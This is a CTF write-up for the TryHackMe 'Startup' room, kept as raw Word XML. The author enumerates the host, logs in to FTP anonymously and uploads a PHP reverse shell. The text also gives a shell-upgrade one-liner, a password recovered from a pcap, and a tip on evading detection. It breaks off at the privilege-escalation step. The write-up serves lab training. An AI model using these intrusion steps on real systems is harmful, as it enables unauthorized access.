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895A4" w14:textId="06E1015B" w:rsidR="002E4036" w:rsidRDefault="00301E66">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Startup </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1B6F4" w14:textId="0FDCD5DA" w:rsidR="002E4036" w:rsidRDefault="00301E66">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical Hacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35048A94" w14:textId="07830C23" w:rsidR="002E4036" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> —</w:t>
      </w:r>
      <w:r w:rsidR="00301E66" w:rsidRPr="00301E66">
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://tryhackme.com/room/startup</w:t>
      </w:r>
      <w:r w:rsidR="008D31C5">
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>– Achira Thilakarathne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4524BD" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="002E4036"/>
    <w:p w14:paraId="199F1964" w14:textId="77777777" w:rsidR="002E4036" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A545094" w14:textId="385EF785" w:rsidR="002E4036" w:rsidRDefault="00301E66" w:rsidP="00301E66">
      <w:r>
        <w:t>Nmap was able to find these open ports and the versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8841F" w14:textId="2CA381DF" w:rsidR="002E4036" w:rsidRDefault="00301E66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BA12A5" wp14:editId="5CD0266C">
            <wp:extent cx="6400800" cy="1800225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="161884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46958" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="1800225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A8C72" w14:textId="16942608" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:t xml:space="preserve">Most of these versions were vulnerable to DoS &amp; DDoS attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF15E0C" w14:textId="52F89761" w:rsidR="002E4036" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A1A2E"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00301E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof Of Concept </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667AC221" w14:textId="175BC8A9" w:rsidR="002E4036" w:rsidRDefault="00301E66">
      <w:pPr>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly I ran the nmap scan shown in the overview, I investigated the website they have hosted on port 80, which had nothing useful, just text saying that the site is under maintenance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D9D93" w14:textId="62F5D8F5" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C910B18" wp14:editId="29E9E156">
            <wp:extent cx="3686175" cy="2418321"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="434973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73115" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3698550" cy="2426440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="332BA35F" w14:textId="77777777" w:rsidR="00301E66" w:rsidRDefault="00301E66"/>
    <w:p w14:paraId="76545AF7" w14:textId="321B53FB" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:t xml:space="preserve">Then I checked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for other hidden directories within the website</w:t>
      </w:r>
      <w:r w:rsidR="005A77C4">
        <w:t xml:space="preserve"> using the common.txt wordlist provided default by kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A77C4">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which I managed to find files</w:t>
      </w:r>
      <w:r w:rsidR="005A77C4">
        <w:t xml:space="preserve"> directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB59FA7" w14:textId="1F11A060" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02423EAC" wp14:editId="51E4D568">
            <wp:extent cx="4086225" cy="2641859"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="532935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35568" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4102130" cy="2652142"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864225D" w14:textId="5BCA2651" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:t xml:space="preserve">After viewing the files directory, we can see the files that are available for us but most of these are useless but the ftp one, so since we have access to the ftp folder we should investigate the ftp port that’s open. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F388B91" w14:textId="454F0DB6" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04CDD0A5" wp14:editId="368F31AD">
            <wp:extent cx="4048125" cy="2401660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="432526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26836" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4054117" cy="2405215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7803C" w14:textId="77777777" w:rsidR="00301E66" w:rsidRDefault="00301E66"/>
    <w:p w14:paraId="1FBEDFD1" w14:textId="352816B0" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:t xml:space="preserve">Apon trying to get into ftp with default names, I was able to get in using Anonymous username and </w:t>
      </w:r>
      <w:r w:rsidRPr="00301E66">
        <w:t>Anonymous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password, which means they have not properly configured their ftp. Not a vulnerability just lack of proper security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55566F" w14:textId="35F38FE7" w:rsidR="00301E66" w:rsidRDefault="00301E66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BE45ACC" wp14:editId="05C34626">
            <wp:extent cx="3962400" cy="2718233"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="45375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59231" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3974453" cy="2726501"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D01BAA" w14:textId="1A7AB5A1" w:rsidR="00301E66" w:rsidRDefault="005A77C4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">And not only that we have full permission for the ftp folder, so here we can deploy a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web shell since we are able to view and execute it through the website. I used the default </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell in kali, and executed it and was able to get the reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818FA65" w14:textId="6CAC3348" w:rsidR="005A77C4" w:rsidRDefault="005A77C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="253839AF" wp14:editId="427FE2B9">
            <wp:extent cx="4686300" cy="3142796"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="147530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04903" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4691222" cy="3146097"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81C6CF" w14:textId="77777777" w:rsidR="005A77C4" w:rsidRDefault="005A77C4"/>
    <w:p w14:paraId="3FB4C419" w14:textId="0471F2AD" w:rsidR="005A77C4" w:rsidRDefault="005A77C4">
      <w:r>
        <w:t xml:space="preserve">Reverse shell was taken from the port 1234 (Best put it on a common outgoing port to not get detected) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF5E98" w14:textId="77777777" w:rsidR="005A77C4" w:rsidRDefault="005A77C4"/>
    <w:p w14:paraId="2247ED40" w14:textId="09EE49AD" w:rsidR="005A77C4" w:rsidRDefault="005A77C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158D28B3" wp14:editId="61B08935">
            <wp:extent cx="5286375" cy="2234647"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="188775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57715" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5290586" cy="2236427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97148A" w14:textId="61429064" w:rsidR="005A77C4" w:rsidRDefault="005A77C4"/>
    <w:p w14:paraId="1578C56F" w14:textId="77777777" w:rsidR="005A77C4" w:rsidRDefault="005A77C4" w:rsidP="005A77C4">
      <w:r>
        <w:t>After that I upgraded the shell using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A88A2B" w14:textId="77777777" w:rsidR="00E332BB" w:rsidRDefault="00E332BB" w:rsidP="005A77C4"/>
    <w:p w14:paraId="2AC93E25" w14:textId="6EE2FFB5" w:rsidR="005A77C4" w:rsidRPr="005A77C4" w:rsidRDefault="005A77C4" w:rsidP="005A77C4">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A77C4">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561DDDF" w14:textId="77777777" w:rsidR="005A77C4" w:rsidRPr="005A77C4" w:rsidRDefault="005A77C4" w:rsidP="005A77C4">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005A77C4">
        <w:t>export TERM=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="168971FB" w14:textId="77777777" w:rsidR="005A77C4" w:rsidRPr="005A77C4" w:rsidRDefault="005A77C4" w:rsidP="005A77C4">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="005A77C4">
        <w:t>CTRL+Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4E3B8" w14:textId="31E665FA" w:rsidR="005A77C4" w:rsidRPr="005A77C4" w:rsidRDefault="005A77C4" w:rsidP="005A77C4">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t xml:space="preserve"> raw -echo; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A77C4">
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="704815C4" w14:textId="77777777" w:rsidR="00E332BB" w:rsidRDefault="00E332BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B815A9A" w14:textId="7E164979" w:rsidR="00301E66" w:rsidRDefault="00E332BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">After going through the machine and checking what files we have permissions to, The home directory had a Directory called Lennie which likely is a username, and I found a pcap inside of the incidents directory called </w:t>
      </w:r>
      <w:r w:rsidRPr="00E332BB">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>suspicious</w:t>
      </w:r>
      <w:r w:rsidR="00D4731A">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056B043" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659FA68E" w14:textId="0956AE94" w:rsidR="00D4731A" w:rsidRDefault="00D4731A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">A text file called </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4731A">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>recipe.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4731A">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>included the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309FC1A" w14:textId="77777777" w:rsidR="00E332BB" w:rsidRPr="005A77C4" w:rsidRDefault="00E332BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297EDE2B" w14:textId="5D7422B4" w:rsidR="00E332BB" w:rsidRDefault="00E332BB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D962C75" w14:textId="0E9ED2E8" w:rsidR="002E4036" w:rsidRDefault="00E332BB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Apong analyzing the pcap and assistance from a another writeup (</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="009A1BFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@michaelshroud01/startup-tryhackme-ctf-walkthrough-78b198c44a1a</w:t>
        </w:r>
        <w:r w:rsidRPr="009A1BFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE09764" w14:textId="77777777" w:rsidR="00E332BB" w:rsidRDefault="00E332BB"/>
    <w:p w14:paraId="607ADBD3" w14:textId="0A16DD22" w:rsidR="00D4731A" w:rsidRDefault="00D4731A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A2E16ED" wp14:editId="3B88C4F1">
            <wp:extent cx="5353050" cy="3518781"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="537916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16724" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5357883" cy="3521958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFA2DB" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A"/>
    <w:p w14:paraId="7DAC94DE" w14:textId="34FB5ECF" w:rsidR="00E332BB" w:rsidRDefault="00E332BB">
      <w:r>
        <w:t xml:space="preserve">I was able to find the packet containing crucial information, which was a bunch of login attempts </w:t>
      </w:r>
      <w:r w:rsidR="00D4731A">
        <w:t>to the user account we got through the reverse shell, now that we have a username (Lennie) and password (</w:t>
      </w:r>
      <w:r w:rsidR="00D4731A" w:rsidRPr="00D4731A">
        <w:t>c4ntg3t3n0ughsp1c3</w:t>
      </w:r>
      <w:r w:rsidR="00D4731A">
        <w:t xml:space="preserve">) we should try connecting to this through their ssh port that was open, and sure enough it was a success. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D931A07" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A"/>
    <w:p w14:paraId="2AF7424A" w14:textId="36780FF4" w:rsidR="00D4731A" w:rsidRDefault="00D4731A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03AB1009" wp14:editId="3E8A7DC5">
            <wp:simplePos x="685800" y="5524500"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4324350" cy="3466290"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="57903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31078" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4324350" cy="3466290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Was also able to find the second flag inside of the user.txt. </w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A431C5" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A"/>
    <w:p w14:paraId="031DE5A0" w14:textId="11FC8DD4" w:rsidR="002E4036" w:rsidRDefault="00D4731A" w:rsidP="005A77C4">
      <w:r w:rsidRPr="00D4731A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lennie’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4731A">
        <w:t xml:space="preserve"> there was a script folder, which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> had a planner.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4731A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>which we had permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4731A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="009D743E" w:rsidRPr="00D4731A">
        <w:t>execute,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4731A">
        <w:t xml:space="preserve"> and which would run a print.sh in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4731A">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4731A">
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3322E928" w14:textId="22B283A8" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35719960" wp14:editId="6215CD71">
            <wp:extent cx="5096586" cy="838317"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1211237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237195" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5096586" cy="838317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07959C76" w14:textId="77777777" w:rsidR="00D4731A" w:rsidRDefault="00D4731A" w:rsidP="005A77C4"/>
